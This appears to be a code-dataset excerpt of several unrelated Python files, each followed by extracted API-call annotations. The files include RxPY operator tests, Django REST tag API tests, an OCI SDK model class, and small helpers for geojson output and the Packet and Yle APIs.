return xs.pipe(ops.take_while(predicate))
results = scheduler.start(factory)
assert results.messages == [on_next(210, 2), on_next(260, 5), on_next(
290, 13), on_next(320, 3), on_next(350, 7), on_completed(390)]
assert xs.subscriptions == [subscribe(200, 390)]
assert(invoked == 6)
def test_take_while_dispose_before(self):
scheduler = TestScheduler()
xs = scheduler.create_hot_observable(on_next(90, -1), on_next(110, -1), on_next(210, 2), on_next(260, 5), on_next(290, 13), on_next(
320, 3), on_next(350, 7), on_next(390, 4), on_next(410, 17), on_next(450, 8), on_next(500, 23), on_completed(600))
invoked = 0
def create():
def predicate(x):
nonlocal invoked
invoked += 1
return is_prime(x)
return xs.pipe(ops.take_while(predicate))
results = scheduler.start(create, disposed=300)
assert results.messages == [on_next(210, 2), on_next(260, 5), on_next(290, 13)]
assert xs.subscriptions == [subscribe(200, 300)]
assert(invoked == 3)
def test_take_while_dispose_after(self):
scheduler = TestScheduler()
xs = scheduler.create_hot_observable(on_next(90, -1), on_next(110, -1), on_next(210, 2), on_next(260, 5), on_next(290, 13), on_next(
320, 3), on_next(350, 7), on_next(390, 4), on_next(410, 17), on_next(450, 8), on_next(500, 23), on_completed(600))
invoked = 0
def create():
def predicate(x):
nonlocal invoked
invoked += 1
return is_prime(x)
return xs.pipe(ops.take_while(predicate))
results = scheduler.start(create, disposed=400)
assert results.messages == [on_next(210, 2), on_next(260, 5), on_next(
290, 13), on_next(320, 3), on_next(350, 7), on_completed(390)]
assert xs.subscriptions == [subscribe(200, 390)]
assert(invoked == 6)
def test_take_while_zero(self):
scheduler = TestScheduler()
xs = scheduler.create_hot_observable(on_next(90, -1), on_next(110, -1), on_next(205, 100), on_next(210, 2), on_next(260, 5), on_next(
290, 13), on_next(320, 3), on_next(350, 7), on_next(390, 4), on_next(410, 17), on_next(450, 8), on_next(500, 23), on_completed(600))
invoked = 0
def create():
def predicate(x):
nonlocal invoked
invoked += 1
return is_prime(x)
return xs.pipe(ops.take_while(predicate))
results = scheduler.start(create, disposed=300)
assert results.messages == [on_completed(205)]
assert xs.subscriptions == [subscribe(200, 205)]
assert (invoked == 1)
def test_take_while_on_error(self):
ex = 'ex'
scheduler = TestScheduler()
xs = scheduler.create_hot_observable(on_next(90, -1), on_next(110, -1), on_next(210, 2), on_next(260, 5), on_next(290, 13), on_next(
320, 3), on_next(350, 7), on_next(390, 4), on_next(410, 17), on_next(450, 8), on_next(500, 23), on_completed(600))
invoked = 0
def factory():
def predicate(x):
nonlocal invoked
invoked += 1
if invoked == 3:
raise Exception(ex)
return is_prime(x)
return xs.pipe(ops.take_while(predicate))
results = scheduler.start(factory)
assert results.messages == [on_next(210, 2), on_next(260, 5), on_error(290, ex)]
assert xs.subscriptions == [subscribe(200, 290)]
assert(invoked == 3)
def test_take_while_index(self):
scheduler = TestScheduler()
xs = scheduler.create_hot_observable(on_next(90, -1), on_next(110, -1), on_next(205, 100), on_next(210, 2), on_next(260, 5), on_next(
290, 13), on_next(320, 3), on_next(350, 7), on_next(390, 4), on_next(410, 17), on_next(450, 8), on_next(500, 23), on_completed(600))
def factory():
return xs.pipe(ops.take_while_indexed(lambda x, i: i < 5))
results = scheduler.start(factory)
assert results.messages == [on_next(205, 100), on_next(210, 2), on_next(
260, 5), on_next(290, 13), on_next(320, 3), on_completed(350)]
assert xs.subscriptions == [subscribe(200, 350)]
|
[
"rx.operators.take_while_indexed",
"rx.testing.is_prime",
"rx.testing.TestScheduler",
"rx.operators.take_while"
] |
[((472, 487), 'rx.testing.TestScheduler', 'TestScheduler', ([], {}), '()\n', (485, 487), False, 'from rx.testing import TestScheduler, ReactiveTest, is_prime\n'), ((1335, 1350), 'rx.testing.TestScheduler', 'TestScheduler', ([], {}), '()\n', (1348, 1350), False, 'from rx.testing import TestScheduler, ReactiveTest, is_prime\n'), ((2212, 2227), 'rx.testing.TestScheduler', 'TestScheduler', ([], {}), '()\n', (2225, 2227), False, 'from rx.testing import TestScheduler, ReactiveTest, is_prime\n'), ((3005, 3020), 'rx.testing.TestScheduler', 'TestScheduler', ([], {}), '()\n', (3018, 3020), False, 'from rx.testing import TestScheduler, ReactiveTest, is_prime\n'), ((3868, 3883), 'rx.testing.TestScheduler', 'TestScheduler', ([], {}), '()\n', (3881, 3883), False, 'from rx.testing import TestScheduler, ReactiveTest, is_prime\n'), ((4673, 4688), 'rx.testing.TestScheduler', 'TestScheduler', ([], {}), '()\n', (4686, 4688), False, 'from rx.testing import TestScheduler, ReactiveTest, is_prime\n'), ((5535, 5550), 'rx.testing.TestScheduler', 'TestScheduler', ([], {}), '()\n', (5548, 5550), False, 'from rx.testing import TestScheduler, ReactiveTest, is_prime\n'), ((6340, 6355), 'rx.testing.TestScheduler', 'TestScheduler', ([], {}), '()\n', (6353, 6355), False, 'from rx.testing import TestScheduler, ReactiveTest, is_prime\n'), ((7201, 7216), 'rx.testing.TestScheduler', 'TestScheduler', ([], {}), '()\n', (7214, 7216), False, 'from rx.testing import TestScheduler, ReactiveTest, is_prime\n'), ((935, 946), 'rx.testing.is_prime', 'is_prime', (['x'], {}), '(x)\n', (943, 946), False, 'from rx.testing import TestScheduler, ReactiveTest, is_prime\n'), ((974, 999), 'rx.operators.take_while', 'ops.take_while', (['predicate'], {}), '(predicate)\n', (988, 999), True, 'from rx import operators as ops\n'), ((1779, 1790), 'rx.testing.is_prime', 'is_prime', (['x'], {}), '(x)\n', (1787, 1790), False, 'from rx.testing import TestScheduler, ReactiveTest, is_prime\n'), ((1818, 1843), 'rx.operators.take_while', 'ops.take_while', (['predicate'], {}), '(predicate)\n', (1832, 1843), True, 'from rx import operators as ops\n'), ((2656, 2667), 'rx.testing.is_prime', 'is_prime', (['x'], {}), '(x)\n', (2664, 2667), False, 'from rx.testing import TestScheduler, ReactiveTest, is_prime\n'), ((2695, 2720), 'rx.operators.take_while', 'ops.take_while', (['predicate'], {}), '(predicate)\n', (2709, 2720), True, 'from rx import operators as ops\n'), ((3451, 3462), 'rx.testing.is_prime', 'is_prime', (['x'], {}), '(x)\n', (3459, 3462), False, 'from rx.testing import TestScheduler, ReactiveTest, is_prime\n'), ((3490, 3515), 'rx.operators.take_while', 'ops.take_while', (['predicate'], {}), '(predicate)\n', (3504, 3515), True, 'from rx import operators as ops\n'), ((4311, 4322), 'rx.testing.is_prime', 'is_prime', (['x'], {}), '(x)\n', (4319, 4322), False, 'from rx.testing import TestScheduler, ReactiveTest, is_prime\n'), ((4350, 4375), 'rx.operators.take_while', 'ops.take_while', (['predicate'], {}), '(predicate)\n', (4364, 4375), True, 'from rx import operators as ops\n'), ((5116, 5127), 'rx.testing.is_prime', 'is_prime', (['x'], {}), '(x)\n', (5124, 5127), False, 'from rx.testing import TestScheduler, ReactiveTest, is_prime\n'), ((5155, 5180), 'rx.operators.take_while', 'ops.take_while', (['predicate'], {}), '(predicate)\n', (5169, 5180), True, 'from rx import operators as ops\n'), ((5997, 6008), 'rx.testing.is_prime', 'is_prime', (['x'], {}), '(x)\n', (6005, 6008), False, 'from rx.testing import TestScheduler, ReactiveTest, is_prime\n'), ((6036, 6061), 'rx.operators.take_while', 'ops.take_while', (['predicate'], {}), '(predicate)\n', (6050, 6061), True, 'from rx import operators as ops\n'), ((6858, 6869), 'rx.testing.is_prime', 'is_prime', (['x'], {}), '(x)\n', (6866, 6869), False, 'from rx.testing import TestScheduler, ReactiveTest, is_prime\n'), ((6897, 6922), 'rx.operators.take_while', 'ops.take_while', (['predicate'], {}), '(predicate)\n', (6911, 6922), True, 'from rx import operators as ops\n'), ((7555, 7597), 'rx.operators.take_while_indexed', 'ops.take_while_indexed', (['(lambda x, i: i < 5)'], {}), '(lambda x, i: i < 5)\n', (7577, 7597), True, 'from rx import operators as ops\n')]
|
from geojson import LineString, Feature, FeatureCollection, Point
import geojson
def simple_output(parser, place_data):
for d in place_data:
print('{0}, {1}, {2}'.format(d.name, d.address, d.opening_hours_text))
def geojson_output(parser, place_data):
features = []
route = LineString(list(map(lambda p: (p['lon'], p['lat']), parser.points())))
route_feature = Feature(geometry=route)
features.append(route_feature)
places = list(map(lambda p: Feature(geometry=Point(p.coord),properties=p._asdict()), place_data))
features.extend(places)
collection = FeatureCollection(features)
dump = geojson.dumps(collection, sort_keys=True, indent=4)
print(dump)
|
[
"geojson.Point",
"geojson.Feature",
"geojson.FeatureCollection",
"geojson.dumps"
] |
[((387, 410), 'geojson.Feature', 'Feature', ([], {'geometry': 'route'}), '(geometry=route)\n', (394, 410), False, 'from geojson import LineString, Feature, FeatureCollection, Point\n'), ((595, 622), 'geojson.FeatureCollection', 'FeatureCollection', (['features'], {}), '(features)\n', (612, 622), False, 'from geojson import LineString, Feature, FeatureCollection, Point\n'), ((634, 685), 'geojson.dumps', 'geojson.dumps', (['collection'], {'sort_keys': '(True)', 'indent': '(4)'}), '(collection, sort_keys=True, indent=4)\n', (647, 685), False, 'import geojson\n'), ((496, 510), 'geojson.Point', 'Point', (['p.coord'], {}), '(p.coord)\n', (501, 510), False, 'from geojson import LineString, Feature, FeatureCollection, Point\n')]
|
# ===============================================================================
# Copyright 2012 <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===============================================================================
# ============= enthought library imports =======================
from __future__ import absolute_import
from traits.api import Float, Str
from traitsui.api import View, Item, VGroup, EnumEditor
# ============= standard library imports ========================
# ============= local library imports ==========================
from pychron.pyscripts.commands.core import Command
from traitsui.menu import OKCancelButtons
class Ramp(Command):
setpoint = Float(1)
rate = Float(1)
start = Str
_default_period = 60
period = Float(_default_period)
def traits_view(self):
v = View(
Item("setpoint", label="Setpoint (C)"),
Item("rate", label="Rate C/hr"),
VGroup(
Item("start", label="Start Setpoint (C)"),
Item("period", label="Update Period (s)"),
show_border=True,
label="Optional",
),
buttons=OKCancelButtons,
)
return v
def _to_string(self):
start = None
try:
start = float(start)
except (ValueError, TypeError):
pass
words = [
("setpoint", self.setpoint, True),
("rate", self.rate, True),
]
if start is not None:
words.append(("start", start, True))
if self.period != self._default_period:
words.append(("period", self.period, True))
return self._keywords(words)
time_dict = dict(h="hours", m="minutes", s="seconds")
class Setpoint(Command):
setpoint = Float
duration = Float
units = Str("h")
def _get_view(self):
v = VGroup(
Item("setpoint", label="Temperature (C)"),
Item("duration", label="Duration (units)"),
Item(
"units",
editor=EnumEditor(values=time_dict),
),
)
return v
def _to_string(self):
words = [
("temperature", self.setpoint, True),
("duration", self.duration, True),
("units", self.units),
]
return self._keywords(words)
# ============= EOF =============================================
|
[
"traits.api.Float",
"traitsui.api.EnumEditor",
"traits.api.Str",
"traitsui.api.Item"
] |
[((1193, 1201), 'traits.api.Float', 'Float', (['(1)'], {}), '(1)\n', (1198, 1201), False, 'from traits.api import Float, Str\n'), ((1213, 1221), 'traits.api.Float', 'Float', (['(1)'], {}), '(1)\n', (1218, 1221), False, 'from traits.api import Float, Str\n'), ((1276, 1298), 'traits.api.Float', 'Float', (['_default_period'], {}), '(_default_period)\n', (1281, 1298), False, 'from traits.api import Float, Str\n'), ((2352, 2360), 'traits.api.Str', 'Str', (['"""h"""'], {}), "('h')\n", (2355, 2360), False, 'from traits.api import Float, Str\n'), ((1357, 1395), 'traitsui.api.Item', 'Item', (['"""setpoint"""'], {'label': '"""Setpoint (C)"""'}), "('setpoint', label='Setpoint (C)')\n", (1361, 1395), False, 'from traitsui.api import View, Item, VGroup, EnumEditor\n'), ((1409, 1440), 'traitsui.api.Item', 'Item', (['"""rate"""'], {'label': '"""Rate C/hr"""'}), "('rate', label='Rate C/hr')\n", (1413, 1440), False, 'from traitsui.api import View, Item, VGroup, EnumEditor\n'), ((2419, 2460), 'traitsui.api.Item', 'Item', (['"""setpoint"""'], {'label': '"""Temperature (C)"""'}), "('setpoint', label='Temperature (C)')\n", (2423, 2460), False, 'from traitsui.api import View, Item, VGroup, EnumEditor\n'), ((2474, 2516), 'traitsui.api.Item', 'Item', (['"""duration"""'], {'label': '"""Duration (units)"""'}), "('duration', label='Duration (units)')\n", (2478, 2516), False, 'from traitsui.api import View, Item, VGroup, EnumEditor\n'), ((1478, 1519), 'traitsui.api.Item', 'Item', (['"""start"""'], {'label': '"""Start Setpoint (C)"""'}), "('start', label='Start Setpoint (C)')\n", (1482, 1519), False, 'from traitsui.api import View, Item, VGroup, EnumEditor\n'), ((1537, 1578), 'traitsui.api.Item', 'Item', (['"""period"""'], {'label': '"""Update Period (s)"""'}), "('period', label='Update Period (s)')\n", (1541, 1578), False, 'from traitsui.api import View, Item, VGroup, EnumEditor\n'), ((2584, 2612), 'traitsui.api.EnumEditor', 'EnumEditor', ([], {'values': 'time_dict'}), '(values=time_dict)\n', (2594, 2612), False, 'from traitsui.api import View, Item, VGroup, EnumEditor\n')]
|
from django.contrib.auth import get_user_model
from django.urls import reverse
from django.test import TestCase
from rest_framework import status
from rest_framework.test import APIClient
from core.models import Tag
from post.serializers import TagSerializer
TAGS_URL = reverse('post:tag-list')
class PublicTagsApiTests(TestCase):
"""Tests for public tags api funtions"""
def setUp(self):
self.client = APIClient()
def test_login_required(self):
"""Test that login is required to list the tags"""
res = self.client.get(TAGS_URL)
self.assertEquals(res.status_code, status.HTTP_401_UNAUTHORIZED)
class PrivateTagsApiTests(TestCase):
"""Tests for private(authed) tags api functions"""
def setUp(self):
params = {
'email': '<EMAIL>',
'password': '<PASSWORD>',
'name': 'Test User'
}
self.user = get_user_model().objects.create_user(**params)
self.client = APIClient()
self.client.force_authenticate(user=self.user)
def test_retrieve_tags(self):
"""Test retrieving tags"""
Tag.objects.create(user=self.user, name='TestTag')
Tag.objects.create(user=self.user, name='TestTag2')
tags = Tag.objects.all().order_by('-name')
serializer = TagSerializer(tags, many=True)
res = self.client.get(TAGS_URL)
self.assertEqual(res.status_code, status.HTTP_200_OK)
self.assertEqual(res.data, serializer.data)
def test_retrieve_tags_limited_to_user(self):
"""Test retrieving tags belong to the specific user"""
user2 = get_user_model().objects.create_user(
email='<EMAIL>',
password='<PASSWORD>'
)
tag = Tag.objects.create(user=self.user, name='TestTag')
Tag.objects.create(user=user2, name='TestTag2')
res = self.client.get(TAGS_URL)
self.assertEqual(res.status_code, status.HTTP_200_OK)
self.assertEqual(len(res.data), 1)
self.assertEqual(res.data[0]['name'], tag.name)
def test_create_tags_successful(self):
"""Test creating a tag successfully"""
params = {
'name': 'tag1',
}
res = self.client.post(TAGS_URL, params)
self.assertEqual(res.status_code, status.HTTP_201_CREATED)
tags_exists = Tag.objects.filter(user=self.user, name='tag1').exists()
self.assertTrue(tags_exists)
def test_create_tags_invalid(self):
"""Test creating a tag invalid attrs"""
params = {
'name': '',
}
res = self.client.post(TAGS_URL, params)
self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)
|
[
"core.models.Tag.objects.create",
"core.models.Tag.objects.filter",
"post.serializers.TagSerializer",
"django.contrib.auth.get_user_model",
"django.urls.reverse",
"core.models.Tag.objects.all",
"rest_framework.test.APIClient"
] |
[((274, 298), 'django.urls.reverse', 'reverse', (['"""post:tag-list"""'], {}), "('post:tag-list')\n", (281, 298), False, 'from django.urls import reverse\n'), ((426, 437), 'rest_framework.test.APIClient', 'APIClient', ([], {}), '()\n', (435, 437), False, 'from rest_framework.test import APIClient\n'), ((984, 995), 'rest_framework.test.APIClient', 'APIClient', ([], {}), '()\n', (993, 995), False, 'from rest_framework.test import APIClient\n'), ((1129, 1179), 'core.models.Tag.objects.create', 'Tag.objects.create', ([], {'user': 'self.user', 'name': '"""TestTag"""'}), "(user=self.user, name='TestTag')\n", (1147, 1179), False, 'from core.models import Tag\n'), ((1188, 1239), 'core.models.Tag.objects.create', 'Tag.objects.create', ([], {'user': 'self.user', 'name': '"""TestTag2"""'}), "(user=self.user, name='TestTag2')\n", (1206, 1239), False, 'from core.models import Tag\n'), ((1313, 1343), 'post.serializers.TagSerializer', 'TagSerializer', (['tags'], {'many': '(True)'}), '(tags, many=True)\n', (1326, 1343), False, 'from post.serializers import TagSerializer\n'), ((1756, 1806), 'core.models.Tag.objects.create', 'Tag.objects.create', ([], {'user': 'self.user', 'name': '"""TestTag"""'}), "(user=self.user, name='TestTag')\n", (1774, 1806), False, 'from core.models import Tag\n'), ((1815, 1862), 'core.models.Tag.objects.create', 'Tag.objects.create', ([], {'user': 'user2', 'name': '"""TestTag2"""'}), "(user=user2, name='TestTag2')\n", (1833, 1862), False, 'from core.models import Tag\n'), ((1256, 1273), 'core.models.Tag.objects.all', 'Tag.objects.all', ([], {}), '()\n', (1271, 1273), False, 'from core.models import Tag\n'), ((2356, 2403), 'core.models.Tag.objects.filter', 'Tag.objects.filter', ([], {'user': 'self.user', 'name': '"""tag1"""'}), "(user=self.user, name='tag1')\n", (2374, 2403), False, 'from core.models import Tag\n'), ((914, 930), 'django.contrib.auth.get_user_model', 'get_user_model', ([], {}), '()\n', (928, 930), False, 'from django.contrib.auth import get_user_model\n'), ((1631, 1647), 'django.contrib.auth.get_user_model', 'get_user_model', ([], {}), '()\n', (1645, 1647), False, 'from django.contrib.auth import get_user_model\n')]
|
from rest_framework.routers import SimpleRouter
router = SimpleRouter()
urlpatterns = router.urls
|
[
"rest_framework.routers.SimpleRouter"
] |
[((59, 73), 'rest_framework.routers.SimpleRouter', 'SimpleRouter', ([], {}), '()\n', (71, 73), False, 'from rest_framework.routers import SimpleRouter\n')]
|
from json.decoder import JSONDecodeError
from typing import Any, Dict, List, Optional
import requests
def fetch_ip_addresses(
headers: Dict[str, str] = {}, instance: Optional[str] = None
) -> Any:
url = "https://api.packet.net/devices/{}".format(instance)
response = requests.get(url, headers=headers)
try:
response_payload = response.json()
if "ip_addresses" not in response_payload:
return []
else:
return response_payload["ip_addresses"]
except JSONDecodeError as e:
raise JSONDecodeError(
"Unable to decode API/metadata response for {}. {}".format(url, e.msg),
e.doc,
e.pos,
)
def fetch_bgp(
use_metadata: bool = True,
headers: Dict[str, str] = {},
instance: Optional[str] = None,
) -> Any:
url = "https://metadata.packet.net/metadata"
ip_addresses = []
if not use_metadata:
if not instance:
raise ValueError("Instance ID must be specified when not using metadata")
url = "https://api.packet.net/devices/{}/bgp/neighbors".format(instance)
ip_addresses = fetch_ip_addresses(headers=headers, instance=instance)
response = requests.get(url, headers=headers)
try:
response_payload = response.json()
if not use_metadata:
response_payload["network"] = {"addresses": ip_addresses}
return response_payload
except JSONDecodeError as e:
raise JSONDecodeError(
"Unable to decode API/metadata response for {}. {}".format(url, e.msg),
e.doc,
e.pos,
)
|
[
"requests.get"
] |
[((282, 316), 'requests.get', 'requests.get', (['url'], {'headers': 'headers'}), '(url, headers=headers)\n', (294, 316), False, 'import requests\n'), ((1214, 1248), 'requests.get', 'requests.get', (['url'], {'headers': 'headers'}), '(url, headers=headers)\n', (1226, 1248), False, 'import requests\n')]
|
# coding: utf-8
# Copyright (c) 2016, 2022, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
from oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel # noqa: F401
from oci.decorators import init_model_state_from_kwargs
@init_model_state_from_kwargs
class UpdateDrgAttachmentDetails(object):
"""
UpdateDrgAttachmentDetails model.
"""
def __init__(self, **kwargs):
"""
Initializes a new UpdateDrgAttachmentDetails object with values from keyword arguments.
The following keyword arguments are supported (corresponding to the getters/setters of this class):
:param display_name:
The value to assign to the display_name property of this UpdateDrgAttachmentDetails.
:type display_name: str
:param drg_route_table_id:
The value to assign to the drg_route_table_id property of this UpdateDrgAttachmentDetails.
:type drg_route_table_id: str
:param network_details:
The value to assign to the network_details property of this UpdateDrgAttachmentDetails.
:type network_details: oci.core.models.DrgAttachmentNetworkUpdateDetails
:param defined_tags:
The value to assign to the defined_tags property of this UpdateDrgAttachmentDetails.
:type defined_tags: dict(str, dict(str, object))
:param freeform_tags:
The value to assign to the freeform_tags property of this UpdateDrgAttachmentDetails.
:type freeform_tags: dict(str, str)
:param export_drg_route_distribution_id:
The value to assign to the export_drg_route_distribution_id property of this UpdateDrgAttachmentDetails.
:type export_drg_route_distribution_id: str
:param route_table_id:
The value to assign to the route_table_id property of this UpdateDrgAttachmentDetails.
:type route_table_id: str
"""
self.swagger_types = {
'display_name': 'str',
'drg_route_table_id': 'str',
'network_details': 'DrgAttachmentNetworkUpdateDetails',
'defined_tags': 'dict(str, dict(str, object))',
'freeform_tags': 'dict(str, str)',
'export_drg_route_distribution_id': 'str',
'route_table_id': 'str'
}
self.attribute_map = {
'display_name': 'displayName',
'drg_route_table_id': 'drgRouteTableId',
'network_details': 'networkDetails',
'defined_tags': 'definedTags',
'freeform_tags': 'freeformTags',
'export_drg_route_distribution_id': 'exportDrgRouteDistributionId',
'route_table_id': 'routeTableId'
}
self._display_name = None
self._drg_route_table_id = None
self._network_details = None
self._defined_tags = None
self._freeform_tags = None
self._export_drg_route_distribution_id = None
self._route_table_id = None
@property
def display_name(self):
"""
Gets the display_name of this UpdateDrgAttachmentDetails.
A user-friendly name. Does not have to be unique, and it's changeable.
Avoid entering confidential information.
:return: The display_name of this UpdateDrgAttachmentDetails.
:rtype: str
"""
return self._display_name
@display_name.setter
def display_name(self, display_name):
"""
Sets the display_name of this UpdateDrgAttachmentDetails.
A user-friendly name. Does not have to be unique, and it's changeable.
Avoid entering confidential information.
:param display_name: The display_name of this UpdateDrgAttachmentDetails.
:type: str
"""
self._display_name = display_name
@property
def drg_route_table_id(self):
"""
Gets the drg_route_table_id of this UpdateDrgAttachmentDetails.
The `OCID`__ of the DRG route table that is assigned to this attachment.
The DRG route table manages traffic inside the DRG.
You can't remove a DRG route table from a DRG attachment, but you can reassign which
DRG route table it uses.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:return: The drg_route_table_id of this UpdateDrgAttachmentDetails.
:rtype: str
"""
return self._drg_route_table_id
@drg_route_table_id.setter
def drg_route_table_id(self, drg_route_table_id):
"""
Sets the drg_route_table_id of this UpdateDrgAttachmentDetails.
The `OCID`__ of the DRG route table that is assigned to this attachment.
The DRG route table manages traffic inside the DRG.
You can't remove a DRG route table from a DRG attachment, but you can reassign which
DRG route table it uses.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param drg_route_table_id: The drg_route_table_id of this UpdateDrgAttachmentDetails.
:type: str
"""
self._drg_route_table_id = drg_route_table_id
@property
def network_details(self):
"""
Gets the network_details of this UpdateDrgAttachmentDetails.
:return: The network_details of this UpdateDrgAttachmentDetails.
:rtype: oci.core.models.DrgAttachmentNetworkUpdateDetails
"""
return self._network_details
@network_details.setter
def network_details(self, network_details):
"""
Sets the network_details of this UpdateDrgAttachmentDetails.
:param network_details: The network_details of this UpdateDrgAttachmentDetails.
:type: oci.core.models.DrgAttachmentNetworkUpdateDetails
"""
self._network_details = network_details
@property
def defined_tags(self):
"""
Gets the defined_tags of this UpdateDrgAttachmentDetails.
Defined tags for this resource. Each key is predefined and scoped to a
namespace. For more information, see `Resource Tags`__.
Example: `{\"Operations\": {\"CostCenter\": \"42\"}}`
__ https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm
:return: The defined_tags of this UpdateDrgAttachmentDetails.
:rtype: dict(str, dict(str, object))
"""
return self._defined_tags
@defined_tags.setter
def defined_tags(self, defined_tags):
"""
Sets the defined_tags of this UpdateDrgAttachmentDetails.
Defined tags for this resource. Each key is predefined and scoped to a
namespace. For more information, see `Resource Tags`__.
Example: `{\"Operations\": {\"CostCenter\": \"42\"}}`
__ https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm
:param defined_tags: The defined_tags of this UpdateDrgAttachmentDetails.
:type: dict(str, dict(str, object))
"""
self._defined_tags = defined_tags
@property
def freeform_tags(self):
"""
Gets the freeform_tags of this UpdateDrgAttachmentDetails.
Free-form tags for this resource. Each tag is a simple key-value pair with no
predefined name, type, or namespace. For more information, see `Resource Tags`__.
Example: `{\"Department\": \"Finance\"}`
__ https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm
:return: The freeform_tags of this UpdateDrgAttachmentDetails.
:rtype: dict(str, str)
"""
return self._freeform_tags
@freeform_tags.setter
def freeform_tags(self, freeform_tags):
"""
Sets the freeform_tags of this UpdateDrgAttachmentDetails.
Free-form tags for this resource. Each tag is a simple key-value pair with no
predefined name, type, or namespace. For more information, see `Resource Tags`__.
Example: `{\"Department\": \"Finance\"}`
__ https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm
:param freeform_tags: The freeform_tags of this UpdateDrgAttachmentDetails.
:type: dict(str, str)
"""
self._freeform_tags = freeform_tags
@property
def export_drg_route_distribution_id(self):
"""
Gets the export_drg_route_distribution_id of this UpdateDrgAttachmentDetails.
The `OCID`__ of the export route distribution used to specify how routes in the assigned DRG route table
are advertised out through the attachment.
If this value is null, no routes are advertised through this attachment.
__ https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm
:return: The export_drg_route_distribution_id of this UpdateDrgAttachmentDetails.
:rtype: str
"""
return self._export_drg_route_distribution_id
@export_drg_route_distribution_id.setter
def export_drg_route_distribution_id(self, export_drg_route_distribution_id):
"""
Sets the export_drg_route_distribution_id of this UpdateDrgAttachmentDetails.
The `OCID`__ of the export route distribution used to specify how routes in the assigned DRG route table
are advertised out through the attachment.
If this value is null, no routes are advertised through this attachment.
__ https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm
:param export_drg_route_distribution_id: The export_drg_route_distribution_id of this UpdateDrgAttachmentDetails.
:type: str
"""
self._export_drg_route_distribution_id = export_drg_route_distribution_id
@property
def route_table_id(self):
"""
Gets the route_table_id of this UpdateDrgAttachmentDetails.
This is the `OCID`__ of the route table that is used to route the traffic as it enters a VCN through this attachment.
For information about why you would associate a route table with a DRG attachment, see:
* `Transit Routing: Access to Multiple VCNs in Same Region`__
* `Transit Routing: Private Access to Oracle Services`__
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
__ https://docs.cloud.oracle.com/iaas/Content/Network/Tasks/transitrouting.htm
__ https://docs.cloud.oracle.com/iaas/Content/Network/Tasks/transitroutingoracleservices.htm
:return: The route_table_id of this UpdateDrgAttachmentDetails.
:rtype: str
"""
return self._route_table_id
@route_table_id.setter
def route_table_id(self, route_table_id):
"""
Sets the route_table_id of this UpdateDrgAttachmentDetails.
This is the `OCID`__ of the route table that is used to route the traffic as it enters a VCN through this attachment.
For information about why you would associate a route table with a DRG attachment, see:
* `Transit Routing: Access to Multiple VCNs in Same Region`__
* `Transit Routing: Private Access to Oracle Services`__
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
__ https://docs.cloud.oracle.com/iaas/Content/Network/Tasks/transitrouting.htm
__ https://docs.cloud.oracle.com/iaas/Content/Network/Tasks/transitroutingoracleservices.htm
:param route_table_id: The route_table_id of this UpdateDrgAttachmentDetails.
:type: str
"""
self._route_table_id = route_table_id
def __repr__(self):
return formatted_flat_dict(self)
def __eq__(self, other):
if other is None:
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
return not self == other
|
[
"oci.util.formatted_flat_dict"
] |
[((11878, 11903), 'oci.util.formatted_flat_dict', 'formatted_flat_dict', (['self'], {}), '(self)\n', (11897, 11903), False, 'from oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel\n')]
|
import json
import urllib.request
from dotenv import load_dotenv
import os
from pathlib import Path
from urllib.parse import quote
#.env käyttöön tarvittavat konfiguraatiot
dotenv_path = Path('./.env')
load_dotenv(dotenv_path=dotenv_path)
API_KEY = os.getenv('API_KEY')
API_ID = os.getenv('API_ID')
def get_media(keyword, type) :
#korvataan välilyönnin käyttö %20
keyword = quote(keyword)
with urllib.request.urlopen(f'https://external.api.yle.fi/v1/programs/items.json?q={keyword}&type={type}&app_key={API_KEY}&app_id={API_ID}') as response:
data = response.read()
media = json.loads(data)
filtered_list = []
#luodaan media-olio ja lisätään listaan
for item in media['data']:
media_item = f'http://areena.yle.fi/{item["id"]}'
filtered_list.append(media_item)
return filtered_list
def get_tag(type, category):
with urllib.request.urlopen(f'https://external.api.yle.fi/v1/programs/items.json?type={type}&category={category}&app_key={API_KEY}&app_id={API_ID}') as response:
data = response.read()
media = json.loads(data)
filtered_list = []
#luodaan media-olio ja lisätään listaan
for item in media['data']:
media_item = f'http://areena.yle.fi/{item["id"]}'
filtered_list.append(media_item)
return filtered_list
|
[
"json.loads",
"dotenv.load_dotenv",
"urllib.parse.quote",
"pathlib.Path",
"os.getenv"
] |
